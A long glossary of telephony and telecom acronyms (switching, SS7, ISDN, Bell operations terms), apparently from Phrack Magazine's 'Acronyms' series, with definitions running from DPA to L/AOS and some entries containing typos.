DPA          Distributed power architecture
DPAC         Dedicated plant assignment card
DPAC         Dedicated plant assignment center
DPC          Destination point code (SSY)
DPCM         Differential PCM
DPE          Data path extender
DPGS         Digital pair gain systems
DPIDB        Direct PIDB
DPIDB        Directly connected peripheral interface data bus
DPLL         Digital phase locked loop
DPN          Dip purge number
DPN-PH       Data packet network-packet handler
DPNSS        Digital private network signaling system (BT)
DPP          Discounted payback period
DPP          Distributed processing peripheral
DPR          Dip report and removal
DPSK         Differential phase shift keying
DPSK         Differential phased-shift keying
DPT          Data parameter testing
DPT          Department name
DPU          Digital patch unit
DQ           Digital data-4 8 kb/s INTER/TRA blocal 1-26
DQR          Design quota system report
DQS          Design quota system
DR           Data ready
DR           Data receive
DR           Deactivate request (C/I channel code)
DR           Deactivation request
DR           Digital data-9.6 kb/s INTER/TRA blocal 1-26
DRAM         Digital record announcement machine
DRAM         Dynamic ram
DRCS         Dynamically redefinable character sets
DRHR         Division of revenue hourly
DRMU         Digital remote measurement unit
DRTLRT       Dial repe tie lindal repeatie t
DRU          DACS remote unit
DS           Data set
DS           Digital carrier span
DS           Digital signal
DS           Direct signal
DS-0         Digital signal 0 (one channel at 64 kb/s)
DS-0A        Digital signal at a subrate level on DS-0 for one customer
DS-0B        Digital signals at a subrate level on DS-0 facility for one
              or more CU
DS-1         Digital signal level one
DS0          Digital signal zer0
DSBAM        Double-sideband amplitude module
DSBLD        Disabled (default).
DSC          Digital cross-connection systems
DSC          Digital subscriber controller AM79C3A
DSCT         Digital service copper transport
DSDC         Direct service dial capability
DSI          Digital speech interpolation
DSIG         Direct signaling
DSK          Disk
DSL          Digital subscriber line
DSL          Digital suscriber line
DSLG         digital subscriber line group (DSLG)
DSLINIT      DSL initialization.
DSM          Digital switching module
DSMX         (Ger) Digital signal multiplexer
DSN          Defense switched network/automatic voice network
DSN          Digital signal (level) n
DSNE         Double shelf network equipment frame
DSNOFC       DSN/AUTOVON office totals
DSNTG        DSN/AUTOVON trunk group
DSP          Digital signal processing
DSP          Digital signal processing or digital signal processor
DSP          Digital signal processor
DSP          Domain specific part (ISO 7498)
DSR          Data set ready
DSR          Display results
DSR          Dynamic service register
DSRTP        Digital service remote test port
DSS          Data station selector
DST          Destination of order response
DSU          Data service unit
DSU          Data servicing unit
DSU          Digital service unit
DSU2         Diditalservice unit
DSX          Digital cross-connect
DSX          Digital signal cross-connect
DT           DI-group terminal
DT           Data through (C/I channel code in test mode)
DT           Data transmit
DT           Detect dial tone
DT           Due time
DT1          Data form class 1
DTAC         Digital access connector
DTAC         Digital test access connector
DTAC         Digital test access connector (links SMAS and SLC-96)
DTAM         Document transfer access and manipulation
DTAS         Digital test access system
DTAU         Digital test access unit
DTC          Data test center
DTC          Di-group terminal controller
DTC          Digital telephone controller (ARCOFI + IBC + ICC)
DTC          Digital trunk controller
DTE          Data terminal equipment
DTE          Print current date
DTF          Dial tone first (pay phone)
DTG          Direct trunk group
DTIF         Digital transmission interface frame
DTM          Data test module
DTM          Digital trunk module
DTMF         Dual-tone multifrequency
DTR          Data terminal ready
DTRK         Digital Trunks
DTRK         Digital trunks (line and trunk)
DTU          Di-group terminal unit
DTU          Digital test unit
DU           Data upstream (i.e. IOM2)
DU           Deactivation request upstream (C/I channel code)
DUIH         Direct user interface handler
DUP          Data user part
DUP          Duplicate
DUR          Duration
DUV          Data under voice
DVA          Design verified and assigned
DVX          Digital voice exchange
DW           Digital data-56  kb/s INTER/TRA blocal 1-26
DX           Duplex
DY           Digital service (under 1 mb/s) INTER/TRA blocal 1-26
DYRECT       Sides dynamic real time communication tester (in sitest)
E            E (receive) signal lead (moreover Ear part of E&M)
E            Equipment direction
E            Remote trunk arrangement position subsystem (rta/pss) from troubl
E&M          Receive & transmit/ear & mouth signaling
E-COM        Electronic computer originated mail
E1           Equipment system
E800         Enhanced 800 Service
E911         Enhanced 911
EA           Equal access end office
EA           Expedited data acknowledgement (SS7: in SCCP)
EA           Extended adress
EA           Switched acess INTER/TRA blocal 1-26
EAAT         Equal access alternative technologies
EADAS        Engineering and administration data acquisition system
EADAS/NM     EADAS/network management
EAEO         Equial access end office
EAI          Emergency action interface
EAP          Equal access plan
EARN         European academic research network
EAS          Extended announcement system
EAS          Extended area service
EASD         Equal access service date
EB           Enfia ii end office trunk INTER/TRA blocal 1-26
EBAC         Equipmentc billing accuracy control
EBCDIC       Extended binary coded decimal interexchange code
EBSP         EBS prefix translations
EBSP         Enhanced business services prefix translations
EC           ESS entity and control group number
EC           Echo canceller
EC           Enfia ii tandem trunk INTER/TRA blocal 1-26
EC           Environment code
EC           European community
EC           Exchange carriers
ECAP         Electronic customer access program
ECC          Enter cable change
ECCS         Economic c (hundred) call seconds
ECD          Equipment configuration database
ECDMAN       Equipment configuration database manager
ECF          Enhanced connectivity facility
ECL          Emitter coupled logic
ECMA         European computer manufactueres association
ECPT         Electronic coin public telephone
ECR          Exchange carrier relations
ECS          Electronic crosconnect system
ECS          Equipment class of service
ED           Enter date
EDAC         Electromechanical digital adapter circuit
EDD          Envelope delay distortion
EDI          Electronic data interchange
EDP          Electronic data processing
EDSC         Electronic directory customer counts (ISDN BRCS)
EDSX         Electronic digital signal x-connect
EDZ          Facility emergency assignment list
EE           Combined access INTER/TRA blocal 1-26
EE           Initials of supervisor reviewing this ticket.
EEC          Electronic equipment cabinet
EECT         End-to-end call trace
EEDP         Expanded electronic tandem switching dialing plan
EEE          Electronic equipment enclosures
EEHO         Either end hop off
EEI          Equipment-to-equipment interface
EEPROM       Electrically erasable programmable read only memory
EF           Entrance facility-voice grade INTER/TRA blocal 1-26
EFCTS        Electronic custom telephone service
EFRAP        Exchange feeder route analysis program
EG           Type #2 telegraph INTER/TRA blocal 1-26
EIA          Electronic industries association
EIS          Expanded inband signaling
EISS         Economic impact study system
EIU          Extended interface unit
EIn          Error indication n (C/I channel code)
EKTS         Electonic key telephone service
EKTS         Electronic key telephone sets
EL           Emergency reporting line INTER/TRA blocal 1-26
ELA          Entity load analysis
ELDS         Exchange line data service
ELECL        Electrical
ELEMNTS      Elements
ELI          Electrical line interface
EM           Emergency reporting center trunk INTER/TRA blocal 1-26
EM           Encription module
EM           End of medium (ASCII control)
EMC          Electromagnetic capability
EMC          Electromagnetic compatibility
EME          Electromagnetic emission
EMI          Electromagnetic interference
EML          Expected measured loss
EMM          Expandable mos memory
EMS          Electromagnetic susceptibility
EMS          Expanded memory specification
EMSCC        Electromechanical switching control center
EMV          EMC (german)
EN           Entity
EN           Entity number
EN           Exchange network acess facility INTER/TRA blocal 1-26
ENABL        Enable
ENFIA        Exchange network facility for interstate access
ENHMT        Enhancement
ENQ          Enquiry
ENTDT        Entered date and/or time
EO           End office
EOC          Embedded operation channel
EOE          Electronic order exchange
EOM          End of message
EOS          Extended operating system
EOTT         End office toll trunking
EP           Entrance facility-program grade INTER/TRA blocal 1-26
EP           Expedited data (SS7: in SCCP)
EPIC         Extended PIC
EPL          Electronic switching system program language
EPROM        Erasable programmable read-only memory
EPSCS        Enhanced private switched communication service
EQ           Equalizer
EQ           Equipment only-(network only) assignment INTER/TRA blocal 1-26
EQPT         Equipment
ER           Enhancement request
ER           Error register
ER           Exception report
ERAR         Error return address register
ERC          Error control (IOS)
EREP         Environmental recording editing and printing
ERF          Emergency restoration facility
ERL          Echo return loss
ERP          Effective radiated power
ERPMP        Exception report pumper
ERR          Error
ERRS         Errors
ERTS         Error rate test set
ERTS         Error rate test sets
ERU          Error return address update
ES           Extension service-voice grade INTER/TRA blocal 1-26
ESAC         Electronic systems assistance center
ESAP         Emergency Stand-Alone prefix
ESAP         Emergency stand-alone prefix
ESB          Emergency service bureau
ESC          Enhanced speech circuit
ESC          Escape (ASCII control)
ESC          Three way calling USOC
ESCC2        Extended high level serial communication controller
ESCC8        Like ESCC2
ESD          Electrostatic discharge
ESD          Extened super framing
ESF          Extended super frame
ESF          Speed calling USOC
ESFF         Extended superframe format
ESL          Emergency stand-alone
ESL          Essental service
ESL          Speed calling 8 code USOC
ESM          Call forwarding USOC
ESM          Economic study module
ESMTC        Electronic system maintance
ESN          Electronic serial number (Cell)
ESN          Electronic switched network
ESN          Emergency service number
ESP          Enhanced service procider
ESP          Enhanced service providers
ESP          Essential service protection
ESP          Print entire summary table
ESS          Electronic switching system
ESSX         Electronic switching systen exchange
EST          Established
ESTAB        Establish
ESX          Call waiting USOC
ET           Entrance facility-telegraph grade INTER/TRA blocal 1-26
ET           Exchange termination
ETAS         Emergency technical assistance
ETB          End of transmission block
ETC          Estimated trunk ccs value
ETF          Electronic toll fraud
ETL          Equipment test list
ETN          Electronic tandem network
ETRI         Electronics and telecommunications research institute (ROK)
ETS          Electronic tandem switching
ETS          Electronic translation systems
ETSACI       Electronic tandem switching adminstration channel interface
ETSSP        ETS status panel
ETX          End of text
EU           End user
EU           Extension service-telegrasph grade INTER/TRA blocal 1-26
EUPOT        End user-point of termination
EV           Enhanced emergency reporting trunk INTER/TRA blocal 1-26
EV           Expected value
EVB          Busy call forward USOC
EVC          Bust call forward extended USOC
EVD          Delayed call forward USOC
EVD          Delayed call forwarding
EVST         (Ger) End exchange
EW           Off network MTS/WATS equivalent service INTER/TRA blocal 1-26
EWSD         (Ger) Electronic dialing system (digital)
EX           Exercise
EXD          ECS crossloading option
EXD          Extra digit
EXD          Extra digit (MDII)
EXP          Extra pulse
EXP          Extra pulse (MDII)
EXT          Extension
EXTC         Expenditure type code
F            Facility direction
F            Fault (indicator)
F            Office or base unit from trouble report.
F1           Facility system
FA           Frame aligner
FA           Fuse alarm
FAA          Facility accepted (SS7 in ISUP)
FAC          Facility
FAC          Facility Assiment Center
FACD         Facility changed msg.
FACS         Facilities assignment and control system
FADS         Dorce administration
FANALM       Fan alarm
FAP          Facilities analysis plan
FAR          Facility request (SS7: in ISUP)
FAR          Federal acquisition regulation
FAS          Frame alignment signal
FAST         First application system test
FAT          File allocation table
FAX          Faximile
FC           Feature control
FC           Frame control
FC           From cable
FC/EC        Function code and environment code
FCA          Final closure abandon (MDII)
FCAP         Facility capacity
FCC          Federal communications commission
FCC          Forward command channel
FCC          Frame control center
FCD          Frame comtinuity date
FCG          False cross or ground
FCS          File control systemction
FCS          Frame check sequence
FD           Private line-data INTER/TRA blocal 1-26
FDD          Frame due date
FDDI         Fiber distributed data interface (x3t9.5)
FDI          Feeder/distribution interfaces
FDM          Frequency division multiplex
FDM          Frequency-division multiplexing
FDMA         FDM access
FDP          Field development program
FDT          Frame due time
FDX          Full duplex
FDY          Set fiscal day for LAC
FEA          Custom calling feature/PIC
FEA          Customer feature
FEAT         Feature
FEAT         Features
FEBE         Far end block error (IOM2 monitor message)
FEC          Forward error correction
FECC         Front end communication computer
FED          Far end data
FELP         Far end loop process
FEMF         Foreign electro-motive force
FEPS         Facility and equipment planning system
FEV          Far end voice
FF           Check appropriate space where trouble is located
FF           Form feed
FG           Group-supergroup spectrum INTER/TRA blocal 1-26
FGA          Feature group A
FGB          Feature group B
FGC          Feature group C
FGD          Feature group D
FGE          Feature group E
FGK          Feature group K (ISDN Q.931)
FIB          Forward indication bit (SS7)
FID          Field indentifiers
FIFO         First in
FIFO         First in first out (storage)
FIL          Filter
FIN          Facility information msg.
FIOC         Frame input/output controller
FIP          Facility interface processor
FIPS         Federal information processing standards
FISU         Fill in signal unit (SS7)
FITL         Fiber in the loop
FJ           Frame jump (C/I channel code)
FKP          False key pulse
FKP          False key pulse (MDII)
FL           Fault locate
FL           Fault location
FLA          Flag
FLD          Field
FLEXCOM      Fiber optic communication
FLR          Frame layout report
FLT          Flat
FM           Frequency modulation
FM01         DCT alarm activated or retired - 1AESS
FM02         Possible failure of entire bank not just frame - 1A
FM03         Error rate of specified digroup - 1AESS
FM04         Digroup out of frame more than indicated - 1AESS
FM05         Operation or release of the loop terminal relay-1AESS
FM06         Result of digroup circuit diagnostics -1AESS
FM07         Carrier group alarm status of specific group - 1AESS
FM08         Carrier group alarm count for digroup - 1AESS
FM09         Hourly report of carrier group alarms - 1AESS
FM10         Public switched digital capacity failure - 1AESS
FM11         PUC counts of carrier group errors - 1AESS
FMAC         Facility maintance administration center
FMAC         Facility maintenance and control
FMC          Force management center
FMM          Finite message machine
FN           Feature number
FN           File name
FNBE         Far and near end block error (IOM2 monitor message)
FNPA         Foreign numbering plan area
FOA          First office application
FOC          Fiber optic communications
FON          Fiber optics network
FOR          Frame order report
FORPOT       Foreign potential.
FOS          Frame operations summary
FOS-ALC      Fiber optic systems maintance - Alcatel
FOS-ROCK     Fiber optic system maintance - Rockwell
FOT          Forward transfer (SS7: in ISUP)
FP           Functional protocol
FPC          Foundation peripheral controller
FPC          Frequency comparison pilots
FPS          Fast packet switching
FR           Fire dispatch INTER/TRA blocal 1-26
FR           Fixed resistance
FR           Flat rate
FRAC         Frame aligner circuit
FRC          Forced request configuration
FREQ         Frequency
FRJ          Facility rejected msg. (SS7 in ISUP)
FRMR         Frame reject (LAP-D response)
FRPS         Field reliability performance studies
FRQ          Facility request message
FRS          Flexible route selection
FS           File separator
FS/SYM       Function Schematic/Symbol Numbers (1AESS Test access)
FSA          False start abandon
FSA          False start abandon on incoming trunk
FSC          Frame synchronization clock (i.e. IOM2)
FSK          Frequency shift keying
FSN          Forward sequence number
FT           Foreign exchange trunk INTER/TRA blocal 1-26
FT           Frame time
FTA          Frame transfer analysis
FTC          Frame transfer completion
FTE          Frame transfer establishment
FTG          Final trunk group
FTL          Frame transfer lets
FTP          File transfer protocol
FTR          Frame transfer reprint
FTS          Federal telecommunications system
FTW          Frame transfer withdrawal
FUNCS        Functions
FV           Voice grade facility INTER/TRA blocal 1-26
FW           Wideband channel INTER/TRA blocal 1-26
FWD          Forward
FWM          Frame work management
FWS          Frame work station
FX           Foreign exchange
FX           Foreign exchange INTER/TRA blocal 1-26
FXO          Foreign exchange circuit office direction
FXS          Foreign exchange circuit station direction
G            Spare box.  use for special studies.
GAP          (Ec) group of analysis and provision (for ONP)
GB           Great britain
GBS          Group bridging service
GC           Group card
GCE          Gated Oscillator Error
GCI          General circuit interface (IOM/u(k0)-interface)
GCON         Generic conditions
GCP          Generate Control pulse
GCR          General configuration register
GCS          Group control system
GDSUCOM      Global DSU common
GDSUCOM      Global digital service unit common
GDX          Gated diode crosspoint
GDXACC       Gated diode crosspoint access
GDXC         Gated diode crosspoint compensator
GDXCON       Gated diode crosspoint control circuit
GEISCO       General electric information services company
GFR          General facility report
GG           Getails of reported trouble.
GH           Gain hit
GHZ          Gigahertz
GID          Group ID
GKCCR        Generated key collection and compression routine
GLA          Generate lists for assignment
GND          Ground
GNS          Gainslope
GNS          Gainslope test (SARTS command)
GOC          General order control (TIRKS)
GOS          Grade of service
GP           Group processor
GPA          Gas pressure alarm
GPIB         General purpose interface bus
GPPC         General purpose power controller
GPS          Global positioning system
GR           General requirments (BellCoRe)
GRA          GRS acknowledgement
GRASP        Generic access package
GRD          Ground fault.
GRD          Ground.
GRID         Line unit grid.
GRP          Group
GRP MOD      Group modulator
GRS          Circuit group reset (SS7: in ISUP)
GS           Ground start (on-hook normal)
GS           Group separator
GSA          General services administration
GSAT         General telephone and electronics satellite corporation
GST          Ground start signaling
GSZ          Group size
GTC          General telephone company
GTE          General telephone electronics
GTEI         Global tei
GTS          Gamma transfer service
GTT          Global title transmission
GWY          Gateway
Ger          German
H            Hold state (in EOC)
H            Hours
H            Trouble ticket number.  subparagraph 5.6.4.
H&D          High and dry (trunk test)
H-           High-
H-RAP        Hardware reliability assurance program
HAC          Hands-free add-on circuit (for speakerphone)
HBS          Hunt group blocks of spares
HC           High capacity 1.544 mb/ps-service code for LATA access
HC           Hunt count
HCDS         High capacity digital service
HCDS         High-capacity digital services
HCFE         High-capacity front end
HCSDS        High-capacity satellite digital service
HCTDS        High-capacity terrestrial digital service
HD           High capacity 3.152 mb/ps-service code for LATA access
HDB3         High-density bipolar 3 (cept PRI)
HDFI         HSM digital facilities interface
HDLC         High level DLC
HDLC         High-level data link control
HDSL         High bit-rate digital subscriber line
HDTV         High definition television  (soon to be the new buzz word!!)
HDW          Hardware
HDX          Half duplex
HE           High capacity 6.312 mb/ps-service code for LATA access
HEAP         Home energy assistance program
HEHO         High end hop off
HF           High capacity 6.312-service code for LATA access
HF           Hunt-from telephone number
HFCC         High capacity facility control center
HFR          Hardwara failure rate
HG           High capacity 274.176 mb/s-service code for LATA access
HGBAF        Hardware group blocking acknowledgment failure
HGR          Hunt group report
HGS          Hunt group summary
HGUAF        Hardware group unblocking acknowledgment failure
HH           History header
HH           Record of repair activity.
HI           High
HI           High impedance (C/I channel code)
HI           Highway interrupt
HIC          Hybrid integrated circuit
HIM          Host interface module
HIS          Hunting ISH
HK           Hook
HL IT        Siemens semiconductors (hl)
HLC          Highest lead factor group count
HLDG         Holding
HLLAPI       High level language application program interface
HLSC         High-level service circuits
HM1          Intercom plus  USOC
HMCL         Host message class assignment
HMP          Intercom plus
HNPA         Home numbering plan area
HNS          Hospitality network service
HOBIC        Hotel billing information center
HOBIS        Hotel billing information system
HOLD         Call hold (i.253 b)
HP           Hewlett-packard
HP           Non-DDS digital data 2.4 kb/s INTER/TRA blocal 1-26
HPO          High performance option
HQ           Non-DDS digital data 4.8 kb/s INTER/TRA blocal 1-26
HR           Hour
HR           Non-DDS digital data 9.6 kb/s INTER/TRA blocal 1-26
HRS          Hours prefix
HS           High capacity subrate-service code for LATA access
HSCC         High level serial communication controller   sab82520
HSCX         Extended hscc     sab82525
HSM          Host switching module
HSSDS        High-speed switched digital service
HT           Horizontal tabulator
HT           Hunt-to telephone number
HTI          Highway transfer interrupt
HU           High usage
HU           High-usage trunk
HUNT         Hunting
HUTG         High usage trunk group
HW           High and wet.
HW           High-and-wet
HW           Non-DDS digital data 56  kb/s INTER/TRA blocal 1-26
HW           Pcm highway
HZ           Hertz
I            Cable and pair or associated equipment
I            Information (LAP-D command)
I            Installation
I            Invalid
I&I          Investment and inventory
I&M          Customer services installation and maintenance
I&M          Installation & maintenance
I-           Information (numbered i-frames)
I/O          Ineffective other
I/O          Input/output devices
I/O          Tnput/output
I0           Feature removed
I1           Added feature
IA           Immediate action
IA           Ineffective attempts
IAA          Ineffective attempt analysis.
IAAN         Immediatel action report
IAC0         DLI 0 access error
IAC1         DLI 1 access error
IACS         Intergrated access cross-connected system
IAD          Incomplete address detected (incoming)
IAM          Initial address msg. (SS7: in ISUP)
IB           Instruction buffer
IBC          ISDN burst transceiver circuit
IBN          Integrated business network
IBROFC       ISDN BRCS and Analog Office totals
IC           Incoming call (x.25)
IC           Independent carrier
IC           Installation centers
IC           Inter-LATA carrier
IC           Inter-exchange carrier
IC           Interexchange carriers
IC/MC        Installation and maintence centers
ICA          Incoming advance
ICA          Incoming advance (MDII)
ICAN         Individual circuit analysis
ICAO         International civil aviation organization
ICC          ISDN communications controller
ICC          Interstate commerce commission
ICCU         Inmate call control unit
ICD          Interactive call distribution
ICL          Intra-RSM communication link
ICLID        Individual calling line id
ICM          Integrated call management
ICN          Interconnecting network
ICOM         (taiwan) integrated communication
ICOT         Intercity and outstate trunk
ICP          Intercept
ICPOT        Interexchange carrier-point of termination
ICSC         Inter-LATA customer service center
ICSC         Interexchange carrier service center
ICSC         Interexchange customer service center
ICUG         International closed user groups
ICUP         Individual circuit usage and peg count
ICUR         Individual circuit usage recorder
ID           Idle control code
IDA          (gb) interated digital access (b64+b8+d8)
IDC          Information distribution companies
IDCI         Interim defined central office interface
IDCU         Integrated digital carrier unit
IDCU         Integrated digital carrier unit .
IDCU         Integrated digital carrier unit i.e. AT&T Series 5 RT FP 303G
IDDD         International direct distance dialing
IDEC         ISDN d-channel exchange controller
IDF          Intermediate distributing frame
IDI          Initial domain identifier (ISO 7498)
IDLC         Integrated digital loop carrier
IDLC         Intergrated digital loop carrier
IDP          Individual dialing plan
IDPC         Integrated data protocol controller
IDS          Internal directory system
IDVC         Integrated data/voice channel
IEC          ISDN echo cancellation circuit
IEC          Interexchange carrier
IEC          International electrotechnical comission
IEC-P        (old name of iec-q3)
IEC-Q1       Iec for 2b1q  peb2091
IEC-Q2       Iec-q specially for lt and NT1 (without microprocessor)
IEC-Q3       Iec-q with parallel processor interface (i.e. for daml)
IEC-T        Iec for 4b3t  peb2090
IEEE         Institute of electrical and electronics engineers
IEPC         ISDN exchange power controller
IF           Intermediate frequency
IFAC         Integrated digital carrier unit facility
IFRB         International frecuency registration board
IFRPS        Intercity facility relief planning system
IFS          (switzerland) integrated telecom service
IGS          Idenitfy graphic subrepertoire (teletex)
IIN          Integrated information network
IJR          Input a jeopardy reason
ILC          ISDN link controller
ILINE        IDCU line counts.
IM           Input mux
IM           Interface module
IMA          Additional ineffective machine attempts
IMAS         Integrated mass announcement system
IMC          IOS mailbox control
IMCAT        Input message catalog
IMCF         Interoffice multiple call forwarding
IMD          Intermodulation distortion
IMM          Input message manual
IMMU         IOS memory management unit
IMP          Impedance
IMP          Impules per minute
IMP          Interpersonal messaging protocol (x.420: p2)
IMS          Interprocessor message switch
IMT          Inter-machine trunk
IMTS         Improved mobile telephone service
IMU          Input measured ccs usage data
IN           Intelligent network
IN/1         Intelligent network/1
INA          Intergrated network access
INAP         Intelligent network access point
INC          Incoming trunk groups
INC          International calling
INC          International carrier
INC SEL      Incoming selector
INCAS-A      Integrated network cost analysis - access
INCAS-LT     Integrated network cost analysis - local and toll
INCAS-S      Integrated network cost analysis - shared
INCAS/E      Integrated network cost analysis system
INCAS/I      Integrated network cost analysis system - embedded
INCIS        Integrated network cost information system
INCP         Incomplete
IND          Individual
INF          Information
INF          Information (SS7: in ISUP)
INIT         Allocation table initalization
INL          Inter node link
INN          Inter node network
INQ          Complete circuit inquiry
INR          Information request (SS7: in ISUP)
INS          (japan) information network system (b64+b16+d8)
INT          Interrupt (i.e. C/I channel code)
INTCCTRL     International code control (NTI)
INTCHG       Interexchange
INTEGRIS     Integrated results information service
INTELSAT     International telecommunications satellite consortium
INTR         Interrupt
INW          INWATS [code 258(8000-8299)]
INWATS       Inward wide area telecommunications system
INWATS       Inward wide area telephone service
INWBLKD      INWATS returned blocked
INWBLKD      Inward wide area telecommunications service (INWATS) returned
              blocked
INWBUSY      INWATS all lines busy
INWCCBL      INWATS code control blocked
INWDBOV      INWATS data base overload
INWDBTO      INWATS data base timeout
INWDSBL      INWATS direct signaling blocked
INWNNPA      INWATS nonpurchased NPA
INWNNPA      INWATS nonpurchased numbering plan area (NPA)
INWNOXL      INWATS returned no translation
INWONPA      INWATS invalid ONPA
INWONPA      INWATS invalid originating numbering plan area (ONPA)
INWOVLD      INWATS returned overload
INWUNEQ      INWATS returned unequipped
INWVLIN      INWATS vacant line number
INWVNXX      INWATS vacant NXX
IO           Inward operator
IOAU         Input/output access unit (univac)
IOC          Independent operating company
IOC          Input/output controler (shelf)
IOC          Integrated optical circuit
IOC          International overseas center
IOCC         International overseas completion center
IOCP         Input/output configuration process
IOCS         Input/output control system
IODB         IDCU on-demand B-channel
IOI          Secondary input/output interface pack(s)
IOM          ISDN-oriented modular (architecture and interfaces)
IOM2         Extended iom
IOMI         Input/output microprocessor interface
IOP          Input-output processor
IOP          Input/output Processor
IOP          Input/output driver
IOP          Input/output processor
IOS          ISDN operational software
IOS          Input/output supervisor (IBM)
IOS          Inventory order system
IOSF         Input/output shelf assignment
IOT          Inter-office trunk
IOT          Interoffice test command (SARTS command)
IOT          Interoffice testing
IOTC         International originating toll center
IP           Information provider
IP           Inprogress
IP           Intermediate point
IP           Internet protocol
IPABX        ISDN pabx
IPAC         ISDN pc adapter circuit
IPACS        Interactive planning & control system
IPAT         ISDN primary access transceiver
IPB          Sipb
IPBC         IOM2 PBC (old name for EPIC)
IPC          Inter-process communication
IPC          Interprocess communication
IPCS         IOS process control system
IPCS         Installation product costing system
IPCS         Interactive problem control system
IPIB         Intelligent personal computer interface board
IPIDB        IDCU peripheral interface data bus
IPL          Initial program load
IPL          Interoffice private line signaling
IPL          Interoffice private line signaling test (SARTS command)
IPLAN        Integrated planning and analysis system
IPLS         InterLATA private line services
IPM          Impulse per minute
IPM          Impulses per minute
IPM          Interruptions per minute
IPP          IOS protocol part
IPP          Integrated planning process
IPPC         Interdepartmental project planning committee
IPR          Installation performance results system
IPS          Installation performance results
IPS          Integrated Provisioning System
IPS          Integrated provisions system
IPX          Integrated packet exchange
IQS          Instant request system
IR           Incoming register
IRBR         Integrated resource billing report system
IRC          International record carrier
IRIS         Industry relations information system
IRLF         Incoming register link frame
IRM          Information resource management
IRMC         Incoming register marker connector
IRO          Industry relations operations
IROR         Internal rate of return
IRP          Integrated revenue planning
IRPC         ISDN remote power control   psb2120
IRR          Internal rate of return system
IRRS         Interactive request and retrieval system
IRS          Industrial revenue summary
IRT          IDCU remote digital terminal
IRU          Integrated recovery utility (sperry)
IS           Interrupt set
IS/SADQ      Interstate special access demand quantification
ISA          Indicate status application
ISAC-P       ISDN subscriber access controller
ISAC-S       ISDN subscriber access controller
ISAM         Indexed sequential access method
ISC          Intelligent serial controller
ISC          International switching center
ISC          Planintercompany services coordination plan
ISC/TE       Information systems center for technical education
ISCAR        Information systems costs analysis reports
ISCOM        SWBT intercompany service coordination (ISC) order monitor
ISCP         Integrated service control point
ISCP/MSAP    ISCP/multi-service application platform
ISCP/SPOCK   ISCP/service provisioning and on-line creation tool kit software
ISDN         Integrated services digital network
ISF          Inquire on a single facility
ISG          Isolated system grounding
ISH          Complete circuit inquiry short
ISI          Industry support layout
ISIS         Interstate settlements information system
ISLM         Integrated services line module
ISLU         Integrated services line unit
ISLUCC       Integrated services line unit common controller
ISLUCD       Integrated services line unit common data
ISLUHLSC     Integrated services line unit high level service circuit
ISLUMAN      Integrated services line unit metallic access network
ISLURG       Integrated services line unit ringing generator
ISM          ISDN switching module
ISM          Interactive synchronous mode
ISMP         Industry specific measurement plan
ISMS         Integrated service management system
ISMTL        Information systems management training
ISN          Information systems network
ISN          Integrated systems network
ISNET        Interim solution network (Kansas city only)
ISO          Information systems organization
ISO          International organization for standardization
ISOFC        ISDN office totals
ISOPDB       Information systems organization planning data base
ISOSS        Intercompany service order switching system
ISP          Intermediate service part
ISPBX        Integrated systems PBX
ISPC         International signaling point code (SS7)
ISPF         Interactive system productivity facility
ISPI         ISDN packet interface
ISRP         Information systems rules panel
ISS          Integrated switching system
ISS          Issue
ISSANRC      Interstate special access non-recurring
ISSC         Interfunction special service coordination
ISSCO        Intertoll
ISSN         Integrated special services network
ISSN         Intergrated specal services network
ISSS         ISDN supporting system
ISTA         Interrupt status register
ISUP         ISDN user part
ISUP         ISDN user part (SS7: q.76x)
ISUP         Integrated services user part
IT           Inactivity test (SS7: in SCCP)
IT           Intertandem tie trunk INTER/TRA blocal 1-26
ITAC         ISDN terminal adaptor circuit
ITC          Independent telephone company
ITC          Interdepartmental training center at dallas-texas for
ITD          Intertoll dial
ITEA         Interoffice trunks engineering and administration
ITF          Integrated test facility
ITG          Intergrated traffic generator
ITIMS        Integrated transportation information management system
ITIMS/IE     Itims/information expert
ITM          Cable pair item number
ITNA         Improves thrid number acceptance
ITNO         Item number
ITS          Institute of telecommunication science
ITS          Integrated test system
ITS          Interactive training system
ITSE         Incoming trunk service evaluation
ITSO         Incoming trunk service observation
ITSTC        Information technology steering committee (cen
ITT          Idle trunk test
ITU          International telecommunication union
ITU          International telecommunications union
ITVSE        Intermediary transport vendor service center
ITW          Instructional technology workshop
IU           Network/port interface unit
IUP          Installed user program (IBM)
IVD          Integrated voice data
IVP          Installation verification procedures
IVP          Installation verification program
IVTS         International video teleconferencing service
IWF          Interworking facility (gateway)
IWU          Interworking unit (gateway)
IX           Interactive executive
IXC          Or icinterexchange carrier
IXM          Interexchange mileage
IZ           Interzone


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 23 of 27

                              {Acronyms Part III}

J            Enter centrex (CTX) or multiline hunt group (MLHG) number
JAD          Joint application design
JAM          Jumper activity management
JCL          Job control language
JDC          Japan digital cellular
JDC          Job duties code
JDI          Job disposition indicator
JDIP         Jmos/dopac interface process (comptroller system)
JE           Job evaluation
JEC          Journal entity code
JES          Job entry subsystem (IBM)
JES          Job entry system
JES 2        Job entry system 2 (IBM)
JES 3        Job entry system 3 (IBM)
JET          BTL TIRKS jumper evaluation technique
JFC          Job function code
JGF          Junctor grouping frame
JIB          Job information block (VMS)
JIM          Job information memorandum
JIS          Jurisdictional interstate services
JK           Jack
JKLAP        Jack/key/and lamp access panel
JL           Jumper length
JMOS         Job management operations system
JMOS/PT      JMOS/pricer-tracker
JMOS/RPTS    JMOS reports
JMOSCA       Jmos contract administration
JMX          Jumbogroup multiplex
JOSS         Job order status system (distribution services system)
JOSSVM       Job order status system/VM
JOVIAL       Jule's own version of the international algebraic language
JP71         Joint practice 71
JP80         Joint practice 80
JPH          Jumper placement history
JSC          Job status code
JSN          Junction switch number
JSW          Junctor switch
JTR          Jitter
JTRS         JMOS trouble reporting system (distribution services system)
JUICE        JMOS user input card entry (distribution services system)
K            DACS-SRDC
K            Equipment frame designation
K            Kilobit
KBPS         Kilobits per second
KCA          Key contributor award
KCO          Keep cost order
KD           Keyboard display
KDROP        Key display receive only printer
KDT          Keyboard display terminal
KERMIT       Kermit
KEY          Stop hunt or random make busy hunting
KFT          Kilofeet
KHZ          Kilo-hertz
KHZ          Kilohertz
KITSKOTS     Kansas inward toll service/Kansas outward toll service
KOHM         Kilohms
KOP          Thousands of operations per second
KP           Key pulse
KPR          Killer pair report
KSDS         Key sequence data set (IBM)
KSM          Create a transaction mask
KSR          Keyboard send-receive
KSU          Key service unit
KTA          Korea telecommunication authority (ROK)
KTS          Key telephone set
KTS          Key telephone system
KW           Keyword
L            Shift preference (if any) for this work to be performed.
L/AOS        Legal/advanced office system
